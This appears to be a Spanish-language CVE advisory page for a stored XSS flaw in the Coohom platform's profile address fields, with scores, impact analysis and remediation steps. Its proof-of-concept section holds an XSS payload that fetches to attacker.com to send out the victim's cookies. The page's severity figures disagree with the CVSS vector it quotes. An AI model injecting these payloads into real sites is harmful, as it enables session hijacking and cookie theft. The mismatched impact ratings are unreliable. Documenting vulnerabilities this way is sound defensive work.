CVE-2025-65300
Existe una vulnerabilidad de Cross-Site Scripting (XSS) almacenado en la plataforma SaaS Coohom feVersion=1760060603897 (2025-10-28) en el módulo...
- Publicado
- 9 dic 2025
- Actualizado
- 11 dic 2025
- Asignación de CNA
- mitre
- Evidencia observada
- 8 ago 2026
CVSS primario
nvd · CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:NBajo · próximos 30 días
- Percentil
- 10,0 %
- Fecha del modelo
- 21 sept 2026
EPSS es una estimación estadística, no una certeza o una medida de impacto. Combínelo con CVSS, estado KEV, exposición y su entorno.
Resumen
Existe una vulnerabilidad de Cross-Site Scripting (XSS) almacenado en la plataforma SaaS Coohom feVersion=1760060603897 (2025-10-28) en el módulo Configuración de la cuenta, donde la entrada de usuario sin sanitizar en los campos de dirección (Ciudad, Estado, País/Región) se renderiza nuevamente en la página. Los atacantes pueden inyectar código JavaScript arbitrario, que se ejecuta cuando se visualiza la página de perfil afectada. Esto puede conducir al secuestro de sesión, robo de cookies o ejecución arbitraria de scripts en el navegador de la víctima.
Fuentes
1# Documentación de CVE-2025-65300: XSS almacenado en Coohom ## Resumen CVE-2025-65300 es una vulnerabilidad de Cross-Site Scripting (XSS) almacenado identificada en los campos de dirección del perfil de Configuración de la Cuenta de la plataforma SaaS Coohom. Esta vulnerabilidad permite a un atacante inyectar scripts maliciosos que se ejecutan en el navegador de las víctimas cuando visualizan el perfil comprometido. ## Detalles de la vulnerabilidad - **ID de CVE:** CVE-2025-65300 - **Tipo:** Cross-Site Scripting (XSS) almacenado - **Componente afectado:** Campos de dirección del perfil de Configuración de la Cuenta - **Plataforma:** Coohom (SaaS) - **Vector de ataque:** Remoto - **Complejidad del ataque:** Baja - **Privilegios requeridos:** Bajos (usuario autenticado) - **Impacto en la confidencialidad:** Alto - **Impacto en la integridad:** Alto - **Impacto en la disponibilidad:** Bajo ## PoC (Prueba de Concepto) El siguiente payload puede ser inyectado en los campos de dirección del perfil: ```html <script>alert(document.cookie)</script> ``` Alternativamente, se puede utilizar un payload más sigiloso: ```html <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> ``` ## Análisis de impacto Un atacante autenticado puede explotar esta vulnerabilidad para: - **Robo de sesiones:** Capturar cookies de sesión de otros usuarios que visualicen el perfil comprometido. - **Suplantación de identidad:** Realizar acciones en nombre de la víctima dentro de la plataforma. - **Exfiltración de datos:** Acceder y extraer información sensible visible en el contexto de la página. - **Distribución de malware:** Redirigir a los usuarios a sitios maliciosos o descargar archivos dañinos. - **Defacement:** Modificar visualmente el contenido de la página para los visitantes. ## Recomendaciones de remediación ### Inmediatas 1. **Validación de entrada:** Implementar una validación estricta en el lado del servidor para todos los campos de dirección, rechazando caracteres y patrones sospechosos. 2. **Codificación de salida:** Aplicar codificación contextual (HTML, atributo, JavaScript, CSS) a todos los datos de usuario antes de renderizarlos. 3. **Política de Seguridad de Contenido (CSP):** Implementar una CSP estricta que restrinja la ejecución de scripts no confiables. ### A largo plazo 4. **Revisión de código:** Auditar el código fuente de la plataforma para identificar y corregir patrones de codificación inseguros. 5. **Pruebas de seguridad:** Integrar pruebas automatizadas de seguridad (SAST, DAST) en el ciclo de desarrollo. 6. **Parcheo:** Aplicar el parche oficial proporcionado por Coohom tan pronto como esté disponible. 7. **Monitorización:** Implementar mecanismos de detección de intentos de explotación de XSS en los registros del servidor. ## Referencias - [NVD - CVE-2025-65300](https://nvd.nist.gov/vuln/detail/CVE-2025-65300) - [OWASP - Cross-Site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) - [OWASP - Prevención de XSS](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
Uso responsable
Utilice información sobre vulnerabilidades solo en sistemas de su propiedad o que esté autorizado a probar. Kitploit enlaza con metadatos de investigación pública y no almacena código de explotación ni cargas útiles maliciosas.